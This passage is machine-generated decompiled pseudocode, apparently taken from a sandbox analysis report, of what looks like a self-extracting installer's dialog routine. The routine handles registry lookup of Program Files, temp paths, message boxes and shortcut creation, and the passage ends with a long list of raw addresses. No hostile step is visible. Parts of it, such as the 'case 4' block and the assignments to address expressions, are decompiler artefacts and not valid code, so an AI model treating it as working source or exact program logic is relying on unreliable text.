                                                                                                                                                              									}
                                                                                                                                                              									__eax = E0040A5E2(__eax, __edi);
                                                                                                                                                              									__eflags = _v9;
                                                                                                                                                              									if(_v9 == 0) {
                                                                                                                                                              										__eax = E0040A205(__edi);
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              								goto L155;
                                                                                                                                                              							case 2:
                                                                                                                                                              								__eflags = _a12;
                                                                                                                                                              								if(_a12 == 0) {
                                                                                                                                                              									 &_v7224 = SetWindowTextA(_a4,  &_v7224); // executed
                                                                                                                                                              								}
                                                                                                                                                              								goto L155;
                                                                                                                                                              							case 3:
                                                                                                                                                              								__eflags = _a12;
                                                                                                                                                              								if(_a12 != 0) {
                                                                                                                                                              									goto L155;
                                                                                                                                                              								}
                                                                                                                                                              								__eflags =  *0x419f92;
                                                                                                                                                              								if( *0x419f92 != 0) {
                                                                                                                                                              									goto L155;
                                                                                                                                                              								}
                                                                                                                                                              								__eflags = _v7224 - 0x22;
                                                                                                                                                              								__esi =  &_v7224;
                                                                                                                                                              								_v1080 = 0;
                                                                                                                                                              								if(_v7224 == 0x22) {
                                                                                                                                                              									__esi =  &_v7223;
                                                                                                                                                              								}
                                                                                                                                                              								__eax = E0040A384(__ecx, __esi);
                                                                                                                                                              								__eflags = __eax - 0x400;
                                                                                                                                                              								if(__eax >= 0x400) {
                                                                                                                                                              									goto L155;
                                                                                                                                                              								} else {
                                                                                                                                                              									__al = __esi->i;
                                                                                                                                                              									__eflags = __al - 0x2e;
                                                                                                                                                              									if(__al != 0x2e) {
                                                                                                                                                              										L59:
                                                                                                                                                              										__eflags = __al - 0x5c;
                                                                                                                                                              										if(__al == 0x5c) {
                                                                                                                                                              											L53:
                                                                                                                                                              											 &_v1080 = E0040A477( &_v1080, __esi);
                                                                                                                                                              											L54:
                                                                                                                                                              											__eax =  &_v1080;
                                                                                                                                                              											__eax = E0040A3D9(__ecx,  &_v1080, 0x22);
                                                                                                                                                              											__eflags = __eax;
                                                                                                                                                              											if(__eax != 0) {
                                                                                                                                                              												__eflags =  *((char*)(__eax + 1));
                                                                                                                                                              												if( *((char*)(__eax + 1)) == 0) {
                                                                                                                                                              													 *__eax = 0;
                                                                                                                                                              												}
                                                                                                                                                              											}
                                                                                                                                                              											 &_v1080 = E0040A477(__ebx,  &_v1080);
                                                                                                                                                              											 &_v1080 = E0040B9B0(__esi,  &_v1080); // executed
                                                                                                                                                              											__esi = GetDlgItem(_a4, 0x65);
                                                                                                                                                              											 &_v1080 = SetWindowTextA(__esi,  &_v1080); // executed
                                                                                                                                                              											__eax = SendMessageA(__esi, 0x143, 0, __ebx); // executed
                                                                                                                                                              											__eax =  &_v1080;
                                                                                                                                                              											__eax = E0040A4E9(__ebx,  &_v1080);
                                                                                                                                                              											__eflags = __eax;
                                                                                                                                                              											if(__eax != 0) {
                                                                                                                                                              												 &_v1080 = SendMessageA(__esi, 0x143, 0,  &_v1080);
                                                                                                                                                              											}
                                                                                                                                                              											goto L155;
                                                                                                                                                              										}
                                                                                                                                                              										__eflags = __al;
                                                                                                                                                              										if(__al == 0) {
                                                                                                                                                              											L62:
                                                                                                                                                              											__eax =  &_v20;
                                                                                                                                                              											__eax = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1,  &_v20);
                                                                                                                                                              											__eflags = __eax;
                                                                                                                                                              											if(__eax == 0) {
                                                                                                                                                              												 &_v16 =  &_v1080;
                                                                                                                                                              												__eax =  &_v24;
                                                                                                                                                              												_v16 = 0x400;
                                                                                                                                                              												RegQueryValueExA(_v20, "ProgramFilesDir", 0,  &_v24,  &_v1080,  &_v16) = RegCloseKey(_v20);
                                                                                                                                                              											}
                                                                                                                                                              											__eflags = _v1080;
                                                                                                                                                              											if(_v1080 != 0) {
                                                                                                                                                              												__eax =  &_v1080;
                                                                                                                                                              												__eax = E0040A384(__ecx,  &_v1080);
                                                                                                                                                              												__ecx =  &_v1080;
                                                                                                                                                              												__ecx =  &_v1080 - 1;
                                                                                                                                                              												__eflags =  *((char*)(__eax + __ecx)) - 0x5c;
                                                                                                                                                              												if( *((char*)(__eax + __ecx)) != 0x5c) {
                                                                                                                                                              													 &_v1080 = E0040A5E2( &_v1080, "\\");
                                                                                                                                                              												}
                                                                                                                                                              											}
                                                                                                                                                              											__edi = E0040A384(__ecx, __esi);
                                                                                                                                                              											__eax =  &_v1080;
                                                                                                                                                              											__edi = __edi + E0040A384(__ecx,  &_v1080);
                                                                                                                                                              											__eflags = __edi - 0x3ff;
                                                                                                                                                              											if(__edi < 0x3ff) {
                                                                                                                                                              												 &_v1080 = E0040A5E2( &_v1080, __esi);
                                                                                                                                                              											}
                                                                                                                                                              											goto L54;
                                                                                                                                                              										}
                                                                                                                                                              										__eflags = __esi->i - 0x3a;
                                                                                                                                                              										if(__esi->i == 0x3a) {
                                                                                                                                                              											goto L53;
                                                                                                                                                              										}
                                                                                                                                                              										goto L62;
                                                                                                                                                              									}
                                                                                                                                                              									__eflags = __esi->i - 0x5c;
                                                                                                                                                              									if(__esi->i != 0x5c) {
                                                                                                                                                              										goto L59;
                                                                                                                                                              									}
                                                                                                                                                              									__esi =  &(__esi->i);
                                                                                                                                                              									__eflags = __esi;
                                                                                                                                                              									goto L53;
                                                                                                                                                              								}
                                                                                                                                                              							case 4:
                                                                                                                                                              								__eflags =  *0x419f8c - 1;
                                                                                                                                                              								__eflags = __eax - 0x419f8c;
                                                                                                                                                              								 *__edi =  *__edi + __ecx;
                                                                                                                                                              								__eflags = _a1 & __cl;
                                                                                                                                                              								 *__eax =  *__eax + __al;
                                                                                                                                                              								__eflags =  *__eax;
                                                                                                                                                              							case 5:
                                                                                                                                                              								__eax = _v7224;
                                                                                                                                                              								__eax = _v7224;
                                                                                                                                                              								__eflags = __eax;
                                                                                                                                                              								if(__eax == 0) {
                                                                                                                                                              									L81:
                                                                                                                                                              									 *0x419edf = 0;
                                                                                                                                                              									 *0x419ede = 1;
                                                                                                                                                              									goto L155;
                                                                                                                                                              								}
                                                                                                                                                              								__eax = __eax - 0x30;
                                                                                                                                                              								__eflags = __eax;
                                                                                                                                                              								if(__eax == 0) {
                                                                                                                                                              									 *0x419edf = 0;
                                                                                                                                                              									L80:
                                                                                                                                                              									 *0x419ede = 0;
                                                                                                                                                              									goto L155;
                                                                                                                                                              								}
                                                                                                                                                              								__eax = __eax - 1;
                                                                                                                                                              								__eflags = __eax;
                                                                                                                                                              								if(__eax == 0) {
                                                                                                                                                              									goto L81;
                                                                                                                                                              								}
                                                                                                                                                              								__eax = __eax - 1;
                                                                                                                                                              								__eflags = __eax;
                                                                                                                                                              								if(__eax != 0) {
                                                                                                                                                              									goto L155;
                                                                                                                                                              								}
                                                                                                                                                              								 *0x419edf = 1;
                                                                                                                                                              								goto L80;
                                                                                                                                                              							case 6:
                                                                                                                                                              								__eflags = _a12 - 4;
                                                                                                                                                              								if(_a12 != 4) {
                                                                                                                                                              									goto L155;
                                                                                                                                                              								}
                                                                                                                                                              								_push(0);
                                                                                                                                                              								goto L89;
                                                                                                                                                              							case 7:
                                                                                                                                                              								__eflags = _a12 - 1;
                                                                                                                                                              								if(_a12 != 1) {
                                                                                                                                                              									L106:
                                                                                                                                                              									__eflags = _a12 - 7;
                                                                                                                                                              									if(_a12 == 7) {
                                                                                                                                                              										__eflags =  *0x419f8c;
                                                                                                                                                              										if( *0x419f8c == 0) {
                                                                                                                                                              											 *0x419f8c = 2;
                                                                                                                                                              										}
                                                                                                                                                              										 *0x419f88 = 1;
                                                                                                                                                              									}
                                                                                                                                                              									goto L155;
                                                                                                                                                              								}
                                                                                                                                                              								 &_v3128 = GetTempPathA(0x400,  &_v3128);
                                                                                                                                                              								 &_v3128 = E004076C8( &_v3128);
                                                                                                                                                              								_v8 = _v8 & 0x00000000;
                                                                                                                                                              								_push(0);
                                                                                                                                                              								__ebx = "%s%s%d";
                                                                                                                                                              								while(1) {
                                                                                                                                                              									_push( *0x41409c);
                                                                                                                                                              									__eax =  &_v3128;
                                                                                                                                                              									_push( &_v3128);
                                                                                                                                                              									__eax =  &_v2104;
                                                                                                                                                              									_push(__ebx);
                                                                                                                                                              									_push( &_v2104);
                                                                                                                                                              									__eax =  *__edi();
                                                                                                                                                              									__esp = __esp + 0x14;
                                                                                                                                                              									__eax =  &_v2104;
                                                                                                                                                              									_push( &_v2104);
                                                                                                                                                              									__eax = __esi->i();
                                                                                                                                                              									__eflags = __eax - 0xffffffff;
                                                                                                                                                              									if(__eax == 0xffffffff) {
                                                                                                                                                              										break;
                                                                                                                                                              									}
                                                                                                                                                              									_t134 =  &_v8;
                                                                                                                                                              									 *_t134 = _v8 + 1;
                                                                                                                                                              									__eflags =  *_t134;
                                                                                                                                                              									_push(_v8);
                                                                                                                                                              								}
                                                                                                                                                              								 &_v2104 = SetDlgItemTextA(_a4, 0x65,  &_v2104);
                                                                                                                                                              								__eflags = _v7224;
                                                                                                                                                              								if(_v7224 == 0) {
                                                                                                                                                              									goto L155;
                                                                                                                                                              								}
                                                                                                                                                              								__eflags =  *0x41a816;
                                                                                                                                                              								if( *0x41a816 != 0) {
                                                                                                                                                              									goto L155;
                                                                                                                                                              								}
                                                                                                                                                              								__eax =  &_v7224;
                                                                                                                                                              								_v568 = 0;
                                                                                                                                                              								__eax = E0040A3AD( &_v7224, 0x2c);
                                                                                                                                                              								__eflags = __eax;
                                                                                                                                                              								if(__eax != 0) {
                                                                                                                                                              									L102:
                                                                                                                                                              									__eflags = _v568;
                                                                                                                                                              									if(_v568 == 0) {
                                                                                                                                                              										 &_v46304 =  &_v7224;
                                                                                                                                                              										E0040A477( &_v7224,  &_v46304) =  &_v42208;
                                                                                                                                                              										 &_v568 = E0040A477( &_v568,  &_v42208);
                                                                                                                                                              									}
                                                                                                                                                              									 &_v7224 = E0040ABA1( &_v7224);
                                                                                                                                                              									 &_v568 =  &_v7224;
                                                                                                                                                              									_v5176 = 0;
                                                                                                                                                              									__eax = MessageBoxA(_a4,  &_v7224,  &_v568, 0x24);
                                                                                                                                                              									__eflags = __eax - 6;
                                                                                                                                                              									if(__eax == 6) {
                                                                                                                                                              										goto L155;
                                                                                                                                                              									} else {
                                                                                                                                                              										0 = 1;
                                                                                                                                                              										__eflags = 1;
                                                                                                                                                              										 *0x41a815 = 1;
                                                                                                                                                              										 *0x419f78 = 1;
                                                                                                                                                              										__eax = EndDialog(_a4, 1);
                                                                                                                                                              										goto L106;
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              								__esi = 0;
                                                                                                                                                              								__eflags = _v7224;
                                                                                                                                                              								if(_v7224 == 0) {
                                                                                                                                                              									goto L102;
                                                                                                                                                              								} else {
                                                                                                                                                              									goto L98;
                                                                                                                                                              								}
                                                                                                                                                              								while(1) {
                                                                                                                                                              									L98:
                                                                                                                                                              									__eflags =  *((char*)(__ebp + __esi - 0x1c34)) - 0x40;
                                                                                                                                                              									if( *((char*)(__ebp + __esi - 0x1c34)) == 0x40) {
                                                                                                                                                              										break;
                                                                                                                                                              									}
                                                                                                                                                              									__esi =  &(__esi->i);
                                                                                                                                                              									__eflags =  *((char*)(__ebp + __esi - 0x1c34));
                                                                                                                                                              									if( *((char*)(__ebp + __esi - 0x1c34)) != 0) {
                                                                                                                                                              										continue;
                                                                                                                                                              									}
                                                                                                                                                              									goto L102;
                                                                                                                                                              								}
                                                                                                                                                              								__ebp + __esi - 0x1c33 =  &_v568;
                                                                                                                                                              								__eax = E0040A477( &_v568, __ebp + __esi - 0x1c33);
                                                                                                                                                              								 *((char*)(__ebp + __esi - 0x1c34)) = 0;
                                                                                                                                                              								goto L102;
                                                                                                                                                              							case 8:
                                                                                                                                                              								__eflags = _a12 - 3;
                                                                                                                                                              								if(_a12 == 3) {
                                                                                                                                                              									__eflags = _v7224;
                                                                                                                                                              									if(__eflags != 0) {
                                                                                                                                                              										 &_v7224 = SetWindowTextA(_a4,  &_v7224);
                                                                                                                                                              									}
                                                                                                                                                              									__esi =  &_a8;
                                                                                                                                                              									 *0x41a820 = E0040B7BA(__esi, __eflags);
                                                                                                                                                              								}
                                                                                                                                                              								 *0x41a817 = 1;
                                                                                                                                                              								goto L155;
                                                                                                                                                              							case 9:
                                                                                                                                                              								__eflags = _a12 - 5;
                                                                                                                                                              								if(_a12 != 5) {
                                                                                                                                                              									goto L155;
                                                                                                                                                              								}
                                                                                                                                                              								_push(1);
                                                                                                                                                              								L89:
                                                                                                                                                              								 &_v7224 = E0040BD80( &_v7224, __ecx); // executed
                                                                                                                                                              								goto L155;
                                                                                                                                                              							case 0xa:
                                                                                                                                                              								__eflags = _a12 - 6;
                                                                                                                                                              								if(_a12 != 6) {
                                                                                                                                                              									goto L155;
                                                                                                                                                              								}
                                                                                                                                                              								__eax = _v46304;
                                                                                                                                                              								__eax = E0040A250(__ecx, _v46304);
                                                                                                                                                              								__eax = __eax - 0x50;
                                                                                                                                                              								__eflags = __eax;
                                                                                                                                                              								if(__eax == 0) {
                                                                                                                                                              									_v8 = 2;
                                                                                                                                                              								} else {
                                                                                                                                                              									__eax = __eax - 3;
                                                                                                                                                              									__eflags = __eax;
                                                                                                                                                              									if(__eax == 0) {
                                                                                                                                                              										_v8 = 0xb;
                                                                                                                                                              									} else {
                                                                                                                                                              										__eax = __eax - 1;
                                                                                                                                                              										__eflags = __eax;
                                                                                                                                                              										if(__eax == 0) {
                                                                                                                                                              											_v8 = 7;
                                                                                                                                                              										} else {
                                                                                                                                                              											_v8 = 0x10;
                                                                                                                                                              										}
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              								 &_v42208 =  &_v3128;
                                                                                                                                                              								_v8248 = 0;
                                                                                                                                                              								_v2104 = 0;
                                                                                                                                                              								__eax = E0040A477( &_v3128,  &_v42208);
                                                                                                                                                              								__eflags = _v3128 - 0x22;
                                                                                                                                                              								if(__eflags != 0) {
                                                                                                                                                              									 &_v3128 = E00405767(__eflags,  &_v3128, 0);
                                                                                                                                                              									__eflags = __al;
                                                                                                                                                              									if(__al != 0) {
                                                                                                                                                              										goto L142;
                                                                                                                                                              									}
                                                                                                                                                              									__edi = 0;
                                                                                                                                                              									__eflags = _v3128;
                                                                                                                                                              									__esi =  &_v3128;
                                                                                                                                                              									if(_v3128 == 0) {
                                                                                                                                                              										goto L142;
                                                                                                                                                              									} else {
                                                                                                                                                              										goto L130;
                                                                                                                                                              									}
                                                                                                                                                              									do {
                                                                                                                                                              										L130:
                                                                                                                                                              										__bl = __esi->i;
                                                                                                                                                              										__eflags = __bl - 0x20;
                                                                                                                                                              										if(__eflags == 0) {
                                                                                                                                                              											L132:
                                                                                                                                                              											__eax =  &_v3128;
                                                                                                                                                              											__esi->i = 0;
                                                                                                                                                              											__eax = E00405767(__eflags,  &_v3128, 0);
                                                                                                                                                              											__eflags = __al;
                                                                                                                                                              											if(__al == 0) {
                                                                                                                                                              												__esi->i = __bl;
                                                                                                                                                              												goto L139;
                                                                                                                                                              											}
                                                                                                                                                              											__edi = __esi;
                                                                                                                                                              											__eflags = __bl - 0x2f;
                                                                                                                                                              											if(__bl != 0x2f) {
                                                                                                                                                              												do {
                                                                                                                                                              													__esi =  &(__esi->i);
                                                                                                                                                              													__eflags = __esi->i - 0x20;
                                                                                                                                                              												} while (__esi->i == 0x20);
                                                                                                                                                              												_push(__esi);
                                                                                                                                                              												__eax =  &_v2104;
                                                                                                                                                              												L137:
                                                                                                                                                              												_push(__eax);
                                                                                                                                                              												__eax = E0040A477();
                                                                                                                                                              												 *__edi = __bl;
                                                                                                                                                              												goto L139;
                                                                                                                                                              											}
                                                                                                                                                              											_t192 =  &(__esi->i); // 0x1
                                                                                                                                                              											__eax = _t192;
                                                                                                                                                              											_push(_t192);
                                                                                                                                                              											_v2104 = __bl;
                                                                                                                                                              											__eax =  &_v2103;
                                                                                                                                                              											goto L137;
                                                                                                                                                              										}
                                                                                                                                                              										__eflags = __bl - 0x2f;
                                                                                                                                                              										if(__eflags != 0) {
                                                                                                                                                              											goto L139;
                                                                                                                                                              										}
                                                                                                                                                              										goto L132;
                                                                                                                                                              										L139:
                                                                                                                                                              										__esi =  &(__esi->i);
                                                                                                                                                              										__eflags = __esi->i;
                                                                                                                                                              									} while (__esi->i != 0);
                                                                                                                                                              									__eflags = __edi;
                                                                                                                                                              									if(__edi != 0) {
                                                                                                                                                              										 *__edi = 0;
                                                                                                                                                              									}
                                                                                                                                                              									goto L142;
                                                                                                                                                              								} else {
                                                                                                                                                              									 &_v42207 =  &_v3128;
                                                                                                                                                              									E0040A477( &_v3128,  &_v42207) =  &_v3127;
                                                                                                                                                              									__eax = E004073AB( &_v3127, 0x22);
                                                                                                                                                              									__eflags = __eax;
                                                                                                                                                              									if(__eax != 0) {
                                                                                                                                                              										 *__eax = 0;
                                                                                                                                                              										 &_v2104 = E0040A477( &_v2104,  &_v2104);
                                                                                                                                                              									}
                                                                                                                                                              									L142:
                                                                                                                                                              									__eflags = _v25824;
                                                                                                                                                              									if(_v25824 != 0) {
                                                                                                                                                              										 &_v8248 =  &_v25824;
                                                                                                                                                              										__eax = E00405822( &_v25824,  &_v8248);
                                                                                                                                                              									}
                                                                                                                                                              									 &_v17632 =  &_v3128;
                                                                                                                                                              									E00405822( &_v3128,  &_v17632) =  &_v1080;
                                                                                                                                                              									__eax = E0040AAC2(__ecx,  &_v1080, _v8); // executed
                                                                                                                                                              									 &_v1080 = E004076C8( &_v1080);
                                                                                                                                                              									__eflags = _v38112;
                                                                                                                                                              									if(_v38112 != 0) {
                                                                                                                                                              										 &_v38112 =  &_v1080;
                                                                                                                                                              										E0040A5E2( &_v1080,  &_v38112) =  &_v1080;
                                                                                                                                                              										__eax = E004076C8( &_v1080);
                                                                                                                                                              									}
                                                                                                                                                              									 &_v1080 =  &_v13528;
                                                                                                                                                              									__eax = E0040A477( &_v13528,  &_v1080);
                                                                                                                                                              									__eflags = _v29920;
                                                                                                                                                              									__eax =  &_v29920;
                                                                                                                                                              									if(_v29920 == 0) {
                                                                                                                                                              										__eax =  &_v42208;
                                                                                                                                                              									}
                                                                                                                                                              									 &_v1080 = E0040A5E2( &_v1080,  &_v1080);
                                                                                                                                                              									__eax =  &_v1080;
                                                                                                                                                              									__eax = E00407690( &_v1080);
                                                                                                                                                              									__eflags = __eax;
                                                                                                                                                              									if(__eax == 0) {
                                                                                                                                                              										L150:
                                                                                                                                                              										 &_v1080 = E0040A5E2( &_v1080, ".lnk");
                                                                                                                                                              										goto L151;
                                                                                                                                                              									} else {
                                                                                                                                                              										__eax = E0040A59A(__eax, ".lnk");
                                                                                                                                                              										__eflags = __eax;
                                                                                                                                                              										if(__eax == 0) {
                                                                                                                                                              											L151:
                                                                                                                                                              											 &_v1080 = E004058FF(__ebx, __esi,  &_v1080, 0, 1); // executed
                                                                                                                                                              											_v2104 =  ~_v2104;
                                                                                                                                                              											asm("sbb eax, eax");
                                                                                                                                                              											__ecx =  &_v2104;
                                                                                                                                                              											 ~_v2104 &  &_v2104 = _v8248;
                                                                                                                                                              											__eax =  ~_v8248;
                                                                                                                                                              											asm("sbb eax, eax");
                                                                                                                                                              											__ecx =  &_v8248;
                                                                                                                                                              											 ~_v8248 &  &_v8248 = _v34016;
                                                                                                                                                              											__eax =  ~_v34016;
                                                                                                                                                              											asm("sbb eax, eax");
                                                                                                                                                              											__ecx =  &_v34016;
                                                                                                                                                              											 ~_v34016 &  &_v34016 =  &_v1080;
                                                                                                                                                              											 &_v17632 = E0040A9BD( &_v17632,  &_v1080,  ~_v34016 &  &_v34016,  ~_v8248 &  &_v8248,  ~_v2104 &  &_v2104); // executed
                                                                                                                                                              											__eflags = _v13528;
                                                                                                                                                              											if(_v13528 != 0) {
                                                                                                                                                              												__eax =  &_v13528;
                                                                                                                                                              												SHChangeNotify(0x1000, 1,  &_v13528, 0); // executed
                                                                                                                                                              											}
                                                                                                                                                              											goto L155;
                                                                                                                                                              										}
                                                                                                                                                              										goto L150;
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              							case 0xb:
                                                                                                                                                              								__eflags = _a12 - 7;
                                                                                                                                                              								if(_a12 == 7) {
                                                                                                                                                              									 *0x419f90 = 1;
                                                                                                                                                              								}
                                                                                                                                                              								goto L155;
                                                                                                                                                              							case 0xc:
                                                                                                                                                              								__eax = _v7224;
                                                                                                                                                              								__eax = E0040A250(__ecx, _v7224);
                                                                                                                                                              								__eflags = __eax - 0x46;
                                                                                                                                                              								if(__eax == 0x46) {
                                                                                                                                                              									 *0x419edd = 1;
                                                                                                                                                              								} else {
                                                                                                                                                              									__eflags = __eax - 0x55;
                                                                                                                                                              									if(__eax == 0x55) {
                                                                                                                                                              										 *0x419edc = 1;
                                                                                                                                                              									} else {
                                                                                                                                                              										 *0x419edd = 0;
                                                                                                                                                              										 *0x419edc = 0;
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              								goto L155;
                                                                                                                                                              						}
                                                                                                                                                              						L4:
                                                                                                                                                              						E0040A925( &_v7224, _v8);
                                                                                                                                                              						_v8 = _v8 + 0x1000;
                                                                                                                                                              						_t15 =  &_v16;
                                                                                                                                                              						 *_t15 = _v16 - 1;
                                                                                                                                                              						if( *_t15 != 0) {
                                                                                                                                                              							goto L4;
                                                                                                                                                              						} else {
                                                                                                                                                              							_v8 = _v8 & 0x00000000;
                                                                                                                                                              							goto L6;
                                                                                                                                                              						}
                                                                                                                                                              						L155:
                                                                                                                                                              						_t240 = E0040B613(0x1000, _t323, _a8,  &_v21728,  &_v7224,  &_v9,  &_a11);
                                                                                                                                                              						_a8 = _t240;
                                                                                                                                                              					} while (_t240 != 0);
                                                                                                                                                              					goto L157;
                                                                                                                                                              				}
                                                                                                                                                              			}





































                                                                                                                                                              0x0040bf99
                                                                                                                                                              0x0040bfa1
                                                                                                                                                              0x0040bfaa
                                                                                                                                                              0x0040ca5c
                                                                                                                                                              0x0040ca5c
                                                                                                                                                              0x0040bfcf
                                                                                                                                                              0x0040bfd4
                                                                                                                                                              0x0040bfd9
                                                                                                                                                              0x0040ca5a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040bfdf
                                                                                                                                                              0x0040bfe0
                                                                                                                                                              0x0040bfe1
                                                                                                                                                              0x0040bfe1
                                                                                                                                                              0x0040bffe
                                                                                                                                                              0x0040c001
                                                                                                                                                              0x0040c001
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c021
                                                                                                                                                              0x0040c03c
                                                                                                                                                              0x0040c043
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c045
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c045
                                                                                                                                                              0x0040c043
                                                                                                                                                              0x0040c04e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c057
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c05e
                                                                                                                                                              0x0040c062
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c074
                                                                                                                                                              0x0040c088
                                                                                                                                                              0x0040c094
                                                                                                                                                              0x0040c0a7
                                                                                                                                                              0x0040c0b2
                                                                                                                                                              0x0040c0c4
                                                                                                                                                              0x0040c0cf
                                                                                                                                                              0x0040c0d4
                                                                                                                                                              0x0040c0dd
                                                                                                                                                              0x0040c0e3
                                                                                                                                                              0x0040c0e8
                                                                                                                                                              0x0040c0ea
                                                                                                                                                              0x0040c256
                                                                                                                                                              0x0040c25c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c0f0
                                                                                                                                                              0x0040c0f0
                                                                                                                                                              0x0040c0f5
                                                                                                                                                              0x0040c0fe
                                                                                                                                                              0x0040c104
                                                                                                                                                              0x0040c10b
                                                                                                                                                              0x0040c1bb
                                                                                                                                                              0x0040c1c2
                                                                                                                                                              0x0040c1c4
                                                                                                                                                              0x0040c1c7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c1d0
                                                                                                                                                              0x0040c1d6
                                                                                                                                                              0x0040c1d8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c1da
                                                                                                                                                              0x0040c1da
                                                                                                                                                              0x0040c1dd
                                                                                                                                                              0x0040c1de
                                                                                                                                                              0x0040c1e6
                                                                                                                                                              0x0040c1f5
                                                                                                                                                              0x0040c1f7
                                                                                                                                                              0x0040c201
                                                                                                                                                              0x0040c203
                                                                                                                                                              0x0040c206
                                                                                                                                                              0x0040c1e0
                                                                                                                                                              0x0040c1e0
                                                                                                                                                              0x0040c1e0
                                                                                                                                                              0x0040c1e3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c208
                                                                                                                                                              0x0040c216
                                                                                                                                                              0x0040c21c
                                                                                                                                                              0x0040c21e
                                                                                                                                                              0x0040c220
                                                                                                                                                              0x0040c225
                                                                                                                                                              0x0040c227
                                                                                                                                                              0x0040c234
                                                                                                                                                              0x0040c234
                                                                                                                                                              0x0040c227
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c21e
                                                                                                                                                              0x0040c206
                                                                                                                                                              0x0040c1d8
                                                                                                                                                              0x0040c116
                                                                                                                                                              0x0040c119
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c12d
                                                                                                                                                              0x0040c139
                                                                                                                                                              0x0040c145
                                                                                                                                                              0x0040c14a
                                                                                                                                                              0x0040c14d
                                                                                                                                                              0x0040c150
                                                                                                                                                              0x0040c163
                                                                                                                                                              0x0040c16c
                                                                                                                                                              0x0040c171
                                                                                                                                                              0x0040c173
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c179
                                                                                                                                                              0x0040c187
                                                                                                                                                              0x0040c195
                                                                                                                                                              0x0040c19a
                                                                                                                                                              0x0040c19c
                                                                                                                                                              0x0040c19d
                                                                                                                                                              0x0040c1a7
                                                                                                                                                              0x0040c1ae
                                                                                                                                                              0x0040c1b5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c1b5
                                                                                                                                                              0x0040c159
                                                                                                                                                              0x0040c15e
                                                                                                                                                              0x0040c161
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c23a
                                                                                                                                                              0x0040c23a
                                                                                                                                                              0x0040c243
                                                                                                                                                              0x0040c249
                                                                                                                                                              0x0040c24e
                                                                                                                                                              0x0040c24e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c0f5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c266
                                                                                                                                                              0x0040c26a
                                                                                                                                                              0x0040c270
                                                                                                                                                              0x0040c275
                                                                                                                                                              0x0040c277
                                                                                                                                                              0x0040c27a
                                                                                                                                                              0x0040c27c
                                                                                                                                                              0x0040c284
                                                                                                                                                              0x0040c284
                                                                                                                                                              0x0040c289
                                                                                                                                                              0x0040c28d
                                                                                                                                                              0x0040c297
                                                                                                                                                              0x0040c29f
                                                                                                                                                              0x0040c28f
                                                                                                                                                              0x0040c28f
                                                                                                                                                              0x0040c28f
                                                                                                                                                              0x0040c2a1
                                                                                                                                                              0x0040c2a3
                                                                                                                                                              0x0040c2b4
                                                                                                                                                              0x0040c2a5
                                                                                                                                                              0x0040c2a5
                                                                                                                                                              0x0040c2a5
                                                                                                                                                              0x0040c2bc
                                                                                                                                                              0x0040c2c7
                                                                                                                                                              0x0040c2cc
                                                                                                                                                              0x0040c2d1
                                                                                                                                                              0x0040c2d3
                                                                                                                                                              0x0040c2d5
                                                                                                                                                              0x0040c2d5
                                                                                                                                                              0x0040c2da
                                                                                                                                                              0x0040c2df
                                                                                                                                                              0x0040c2e3
                                                                                                                                                              0x0040c2ea
                                                                                                                                                              0x0040c2ea
                                                                                                                                                              0x0040c2e3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c2f4
                                                                                                                                                              0x0040c2f8
                                                                                                                                                              0x0040c308
                                                                                                                                                              0x0040c308
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c313
                                                                                                                                                              0x0040c317
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c31d
                                                                                                                                                              0x0040c324
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c32a
                                                                                                                                                              0x0040c331
                                                                                                                                                              0x0040c337
                                                                                                                                                              0x0040c33e
                                                                                                                                                              0x0040c340
                                                                                                                                                              0x0040c340
                                                                                                                                                              0x0040c347
                                                                                                                                                              0x0040c34c
                                                                                                                                                              0x0040c351
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040c357
                                                                                                                                                              0x0040c357
                                                                                                                                                              0x0040c359
                                                                                                                                                              0x0040c35b
                                                                                                                                                              0x0040c408
                                                                                                                                                              0x0040c408
                                                                                                                                                              0x0040c40a
                                                                                                                                                              0x0040c36e
                                                                                                                                                              0x0040c376
                                                                                                                                                              0x0040c37b
                                                                                                                                                              0x0040c37d
                                                                                                                                                              0x0040c384
                                                                                                                                                              0x0040c389
                                                                                                                                                              0x0040c38b
                                                                                                                                                              0x0040c38d
                                                                                                                                                              0x0040c391
                                                                                                                                                              0x0040c393
                                                                                                                                                              0x0040c393
                                                                                                                                                              0x0040c391
                                                                                                                                                              0x0040c39e
                                                                                                                                                              0x0040c3aa
                                                                                                                                                              0x0040c3ba
                                                                                                                                                              0x0040c3c4
                                                                                                                                                              0x0040c3d3
                                                                                                                                                              0x0040c3d9
                                                                                                                                                              0x0040c3e1
                                                                                                                                                              0x0040c3e6
                                                                                                                                                              0x0040c3e8
                                                                                                                                                              0x0040c3fd
